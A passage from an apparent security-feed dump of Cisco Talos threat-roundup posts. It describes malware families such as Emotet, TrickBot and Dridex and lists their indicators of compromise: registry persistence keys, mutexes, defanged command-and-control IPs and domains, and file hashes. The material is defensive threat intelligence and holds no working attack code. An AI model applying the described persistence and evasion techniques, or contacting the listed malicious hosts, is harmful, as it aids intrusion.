AMP\n\n[](<https://1.bp.blogspot.com/-4z-4bO77Lzs/XU3RwPft74I/AAAAAAAACU0/uoDbEVkJTKQRWVGv4W95-TFIoXCCY3B8ACLcBGAs/s1600/392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NxfAdHYHNiY/XU3R1DOsDEI/AAAAAAAACU8/5wVY6_4vSeQfByumNeNjjHwOKVQznQuYACLcBGAs/s1600/392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f_tg.png>)\n\n \n\n\n \n\n\nExploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (2337) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (1399) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nTrickbot malware detected \\- (1212) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nExcessively long PowerShell command detected \\- (1002) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (466) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (297) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (152) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (118) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPossible fileless malware download \\- (95) \nA site commonly used by fileless malware to download additional data has been detected. Several different families of malware have been observed using these sites to download additional stages to inject into other processes. \nIcedID malware detected \\- (52) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n", "modified": "2019-08-09T13:28:08", "published": "2019-08-09T13:28:08", "id": "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6_zbjoDpG84/threat-roundup-0802-0809.html", "type": "talosblog", "title": "Threat Roundup for August 2 to August 9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T19:22:56", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 13 and Dec. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7451163-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.TrickBot-7455405-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Packed.Dridex-7447905-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. \nWin.Packed.Razy-7450491-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Dropper.NetWire-7454096-1 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Trojan.Tofsee-7450732-0 | Trojan | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nDoc.Downloader.Sagent-7454309-0 | Downloader | Sagent downloads and executes a binary using PowerShell from a Microsoft Word document. \nWin.Malware.Gandcrab-7454521-1 | Malware | Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension \".GDCB,\" \".CRAB\" or \".KRAB\". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. \nWin.Trojan.HawkEye-7455512-1 | Trojan | Hawkeye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7451163-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 10 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionReason ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecision ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadNetworkName ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDetectedUrl ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Description ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionTime ` | 2 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\FLAGS ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\0\\WIN32 ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 2 \n`Global\\M98B68E3C` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]108[.]65[.]228` | 8 \n`100[.]116[.]148[.]111` | 8 \n`100[.]112[.]136[.]191` | 8 \n`100[.]89[.]177[.]62` | 8 \n`100[.]93[.]135[.]190` | 8 \n`168[.]235[.]82[.]183` | 2 \n`96[.]234[.]38[.]186` | 2 \n`120[.]51[.]83[.]89` | 2 \n`204[.]197[.]244[.]176` | 2 \n`149[.]202[.]153[.]251` | 1 \n`103[.]47[.]185[.]215` | 1 \n`107[.]180[.]41[.]254` | 1 \n`69[.]16[.]254[.]127` | 1 \n`82[.]145[.]43[.]153` | 1 \n`139[.]255[.]47[.]211` | 1 \n`37[.]228[.]137[.]204` | 1 \n`157[.]7[.]231[.]227` | 1 \n`202[.]238[.]198[.]32` | 1 \n`202[.]238[.]198[.]30` | 1 \n`60[.]36[.]166[.]212` | 1 \n`192[.]1[.]4[.]230` | 1 \n`50[.]31[.]174[.]165` | 1 \n`113[.]43[.]208[.]199` | 1 \n`202[.]130[.]62[.]24` | 1 \n`103[.]253[.]113[.]131` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`adichip[.]com` | 10 \n`grafdesign[.]pl` | 8 \n`dcjohnsonassociates[.]com` | 8 \n`global-ark[.]co[.]jp` | 8 \n`acadmi[.]co[.]uk` | 8 \n`mail[.]1and1[.]com` | 1 \n`587[.]hexabyte[.]tn` | 1 \n`child-pro[.]com` | 1 \n`imap[.]e-apamanshop[.]com` | 1 \n`sg2plcpnl0259[.]prod[.]sin2[.]secureserver[.]net` | 1 \n`mx1[.]retailconnection[.]co[.]za` | 1 \n`smtp[.]consulmexrio[.]com[.]br` | 1 \n`mail[.]ahg[.]com[.]mx` | 1 \n`mail[.]cassado[.]com[.]pe` | 1 \n`pop[.]aoishokai[.]co[.]jp` | 1 \n`mail[.]thebasechurch[.]org` | 1 \n`miyataseika[.]sakura[.]ne[.]jp` | 1 \n`mail[.]uberved[.]com` | 1 \n`mail[.]victoriasuitehotel[.]com[.]pe` | 1 \n`pop3[.]jinrikiudon[.]co[.]jp` | 1 \n`pop[.]e-apamanshop[.]com` | 1 \n`bh-35[.]webhostbox[.]net` | 1 \n`pop[.]orange[.]jo` | 1 \n`mail[.]muzamilglass[.]com` | 1 \n`mail[.]aceinterioruae[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\576.exe` | 10 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 2 \n \n#### File Hashes\n\n` 24547a6e7ab9766fc85644033e27414deb2409367fae21fdb722174a605a34ad 27e0a7b8c18893b22583e19ef7634fd79fc9cb5daed862f794960ddaa19b58dc 363ecad264cfe3cdef52119a1b78c495d362efa7df5d38d182ce76dbf31facfd 3f0e86777e4a9b3285a9203907f5a7e6f804e7cfda3300b857e8712ac2030e57 5e31045309ab5ecbef3701c9023fc5a4631bf653347447484b652e434b086966 67c3eabb23b74c1a6ee4d384fa6f248c4a2492d998e7aaf0a1ce3f878a8ff715 6ba2589b00a95ff4ce9f7eee550bdffa6ef57dbf0212384ce38696b0c13778bd 7b0c9b63d9e8c6399e13354176e41bde009c94053b0566ef4506b17c14b46ab7 9100a8c4f2f6dd2bde134162d6b70f0d9ac99db4ff1f4551407a8a078ce2c35c c0197a5e801dee8d80df024c32a616c04539a56108b2225b469c7eb5fede5447 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-mpa4EVqp_ns/Xf0C_5O5QnI/AAAAAAAADCI/Bnenu7XaNyU-j8xahDBEzyTDl50QgcHbwCLcBGAsYHQ/s1600/3f0e86777e4a9b3285a9203907f5a7e6f804e7cfda3300b857e8712ac2030e57_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NEG67E4Mz5M/Xf0DNc4qPJI/AAAAAAAADCM/hX-ZTiN4bBY_i3bX_XvJivgsaNjuLJ49wCLcBGAsYHQ/s1600/6ba2589b00a95ff4ce9f7eee550bdffa6ef57dbf0212384ce38696b0c13778bd_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-1rcSJ0oxfYw/Xf0Dzt07JpI/AAAAAAAADCc/R_EgDjOn-lcZtSz1cZRJG_Gq-qKag71vwCLcBGAsYHQ/s1600/9100a8c4f2f6dd2bde134162d6b70f0d9ac99db4ff1f4551407a8a078ce2c35c_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-a3Axop96p_k/Xf0D4SmDspI/AAAAAAAADCg/iMDtVAuX5XYmBsPHmwtqYj1ziOrT8Z3QgCLcBGAsYHQ/s1600/67c3eabb23b74c1a6ee4d384fa6f248c4a2492d998e7aaf0a1ce3f878a8ff715_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.TrickBot-7455405-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`167[.]86[.]123[.]83` | 4 \n`5[.]34[.]177[.]50` | 4 \n`193[.]37[.]213[.]110` | 4 \n`170[.]84[.]78[.]224` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 2 \n`117[.]196[.]233[.]79` | 2 \n`85[.]143[.]220[.]41` | 2 \n`5[.]2[.]72[.]84` | 2 \n`146[.]185[.]219[.]94` | 2 \n`185[.]62[.]189[.]132` | 2 \n`107[.]172[.]29[.]108` | 2 \n`3[.]224[.]145[.]145` | 1 \n`200[.]21[.]51[.]38` | 1 \n`31[.]214[.]138[.]207` | 1 \n`181[.]129[.]104[.]139` | 1 \n`190[.]142[.]200[.]108` | 1 \n`181[.]113[.]28[.]146` | 1 \n`177[.]105[.]242[.]229` | 1 \n`185[.]66[.]13[.]65` | 1 \n`212[.]124[.]117[.]25` | 1 \n`64[.]44[.]133[.]151` | 1 \n`107[.]172[.]208[.]51` | 1 \n`146[.]185[.]253[.]132` | 1 \n`172[.]82[.]152[.]130` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 2 \n`myexternalip[.]com` | 2 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`api[.]ipify[.]org` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\System Network Extensions` | 20 \n`%APPDATA%\\speedlink` | 20 \n`%APPDATA%\\speedlink\\data` | 20 \n`%APPDATA%\\speedlink\\settings.ini` | 20 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 20 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 20 \n`%APPDATA%\\SPEEDLINK\\<original file name>.exe` | 20 \n \n#### File Hashes\n\n` 14c4ecbdba8a97d3157dcbbe5be3ab9270ba9142e6ea6286634e8b9658db5f20 170f8b900b31d3bcdf5e97d870a4b791c7e28754b15b7c90c4e835c2f7d579b7 22c10541cffa8a6c504202fe909fdbaa87375427fb2918ac1ab78a0656a886f0 26c501cea49207f9482fa293ed361c2bb4c163ed6c0a8cf309aa21624570f0ba 2c5c0a1b1998c1686eb2cc6654681aa933eb123feb972110cb2ddd91ab188429 3247f44c8c5bd8707c2a78e71ae03cc4a98845e1af8f7e283ea0189bf2c578bf 7d97d4c51ba4ad8a562264a9a0f8a09165123eeab47b74370f116778e9507cdf 95ee0f3243a2202f706bd45aaa2d27614059773ecb978671324560dc87fa6c03 9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5 9f8aeec6db5f0220c88f6b90777c17f52a0219a5581cd586931782a975d1e068 ae560bec5699185818aa31178b20782fdb5113c202ac29ac9e6e26a4a2ccc091 bbab2020a80bf96b5784d94a395f9239127389e114799d3de605e0a13f0a7f91 c93ab8787073bbbc9cd37a121fa63b1eb782f547ed3a2085c0b09ca3a7549dee d635e095a8694027c0523c7b0ec13409daa295afb99eb40395a3794a948479a5 d7e9dd938f44a2be9163002868973d34bb445ffd008bc007493ee271661fc691 de4ff1ec4bdd8662185ab8776e9ca1a898a402d7c794b8b6f7d4b481a56e3a2b e282e081f44f468e9f12421833b9db629f788b583cc050bf945cb3067be916ae eaab484d0f2cfa0ba4e2ffe301f08e5a2f515195131f023bd8d69b8acafd5bb4 f1265e6373975143d1b68cc5ddde073a615531133a43cc789b425e3d318bd159 f979b407999143cd0d22e46cca3405a14dd0ddb6d022c79aa0f399c7a0b1db9f `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xHZr1vHxCa0/Xf0EIRPg2YI/AAAAAAAADCs/SNyaOhLXyOUtTbJPmz36uZPCj5QJGQQFgCLcBGAsYHQ/s1600/9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-RnOUJi4vVao/Xf0ENJ9wspI/AAAAAAAADCw/dBOVQQK_bPsU24tiRiB45k7jhOi0vJi2gCLcBGAsYHQ/s1600/9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Dridex-7447905-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 16 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 16 \nMutexes | Occurrences \n---|--- \n`2XzfQtwuWo` | 2 \n`6K6du14uPy` | 2 \n`Pl97gmRo4e` | 2 \n`Rn0BgZV5LS` | 2 \n`VdM3QqPmEf` | 2 \n`dfSE5V35Cq` | 2 \n`h7l6vKPM9o` | 2 \n`qlxcdn1ONT` | 2 \n`8Uxj8bcq52` | 1 \n`YCQp73aCwI` | 1 \n`A9GTS5Q4V7` | 1 \n`hMRRcbdYM5` | 1 \n`Oa0iwlf5sY` | 1 \n`ogQ7oifBn6` | 1 \n`jZKilZdPlc` | 1 \n`qBGGGgXckD` | 1 \n`l4ibeg830v` | 1 \n`wOMqV2KpkO` | 1 \n`7blYqMoYMu` | 1 \n`3YLHr362i4` | 1 \n`E2Z6XqeW5y` | 1 \n`SUFSEHTYOK` | 1 \n`Jm43Qhf6mW` | 1 \n`SbwW51fbso` | 1 \n`OM3OWBjT4C` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]10[.]238` | 16 \n`104[.]20[.]68[.]143` | 12 \n`104[.]20[.]67[.]143` | 4 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 16 \n`www[.]riirnqa3el[.]com` | 2 \n`www[.]tcofbii6gc[.]com` | 2 \n`www[.]xkwkb7vwyc[.]com` | 2 \n`www[.]luzbvsguu7[.]com` | 2 \n`www[.]e2vqnpqnxa[.]com` | 2 \n`www[.]ddwnd8uazb[.]com` | 2 \n`www[.]yg1ihyzjlx[.]com` | 2 \n`www[.]k3okzy7fbv[.]com` | 2 \n`www[.]5rmqghqote[.]com` | 1 \n`www[.]sbbvxwzjds[.]com` | 1 \n`www[.]lfrmipbwhf[.]com` | 1 \n`www[.]5tmjtihjrd[.]com` | 1 \n`www[.]99z7gq8bpa[.]com` | 1 \n`www[.]fn8bcbak8g[.]com` | 1 \n`www[.]j3hh3nvc1x[.]com` | 1 \n`www[.]q6rbctmtup[.]com` | 1 \n`www[.]6y1kayw2zo[.]com` | 1 \n`www[.]cngy66afzf[.]com` | 1 \n`www[.]xwra4vfpbm[.]com` | 1 \n`www[.]xp9isgvq38[.]com` | 1 \n`www[.]3upvufuqla[.]com` | 1 \n`www[.]phtetocd0l[.]com` | 1 \n`www[.]6komu134jz[.]com` | 1 \n`www[.]cmckmtegzm[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`<malware cwd>\\old_<malware exe name> (copy)` | 13 \n \n#### File Hashes\n\n` 01568fc89054049b9f4c65271186513fa9406e5bcaddd2583fa55abea453f3aa 0a07af4ec8798650f1e578f7e48df97980cf18074d2cc8b17955bb129c44607e 2440f0be01bed503a0a4315e8f253d6559063c7dd3dfd7e28379b23cc9fe3929 25effe96a8c27444dac8ff4ff13f75bc56c351faa74ddd0b217bf6c5f8202cbc 282c63152fdf124cba6c392874c96e670ce019b8566c1cba18475701ce06fbac 4d7589c590b5b0e69c5f08c7664bf658fe340b47022299337e9ec0ccf604426e 6b0ab0fb5437d31cef43d3b0cb989832b3d42d4d1c115d2180ffa0e25d6e0be3 6fcbcc1c24bf20ea3dfff5bfad8d0c38e60e46d1c9cbf254d845c58d4cecd1c9 878fd0aa3f953d35e89d4cf6b52183aa3cc0a1ab244665a4262189c065ce04ce 87dabcb18d67440cf631479d6ae1bacb32d82704c3c54e0305c370cd3f122512 a51d3150053e1a9d2176e98f0000acb572ecbe7c33ae596ab9cdfd4a05470b8c a71838cb33ea89f9e3f3201825b7129b8a61f112d946bf9b7671f2af901a07c1 ac29341c883ff743a3213050314bcfe0abffa366fec2abc09434d789bf836bcd b82c549b351a01839d6e3cc9ca60f1aaed2478799f373bcae604b6ede0e0c4e6 bb819890507c80a1cf9e83808d451a00fdae2fb43b1881b3806093bba32c1a8a f8b9bbc15f8697772d577944686a9b9c61547b992d156d0901293b438f359306 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-P-SobapiwkE/Xf0EcT31AQI/AAAAAAAADC4/7ez78ZjpDCgq3ACSop55BgdpiBGl6M3XACLcBGAsYHQ/s1600/01568fc89054049b9f4c65271186513fa9406e5bcaddd2583fa55abea453f3aa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-lcorVe4U7AE/Xf0EhZzbtDI/AAAAAAAADDA/HZ2iExAqrbwrFY6J1GQ0BHb3gsqP2EGFwCLcBGAsYHQ/s1600/4d7589c590b5b0e69c5f08c7664bf658fe340b47022299337e9ec0ccf604426e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7450491-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: None ` | 10 \nMutexes | Occurrences \n---|--- \n`frenchy_shellcode_006` | 10 \n`Global\\{259ce387-0d2a-4287-8147-d7e9dfdbdca4}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`79[.]134[.]225[.]121` | 10 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jogodo[.]duckdns[.]org` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 10 \n`%APPDATA%\\None` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\catalog.dat` | 4 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\settings.bin` | 4 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\storage.dat` | 4 \n \n#### File Hashes\n\n` 06b47808b96d08f6ef2089ff0d8eed4a9d448d5e6ebc4fe86321cfaecb774bc0 0815f50eb9877530cdcc6a30e551772d0c4807e2105e7cc5ecd3b510d7d3a019 0950e389cce1b3be7140f1a9ba2ddd6a677fda7fb50020bfc15d80b9aac8ccec 7e0c1895e8a080c7db4faca83b354d5af326920ce4534658e0c947f61328b468 a3bcf7816ef93cacc688c6b7bebac3b46d6826c85cfd215d5da279af11e509ae cf37f002c857a43c1d45189a68368ed643dc506c0260f4fe436d12e4e2b2d22d d2cf31b477c11ba5cb39a341fc7bedddbf1a7ec9541b105bab8e0022849a88c9 dc0714b70cb172c05ccb08424163e8932add81a498b55a556feb706cb80ffc13 f2d9a6acc6b09b4027dc558a268036a1213deecefae9952670bff42a481daaba f8a661f4823d529c13c7e2698f67aa3a00ed9a27f59e810b75cb4ead41dc3cf2 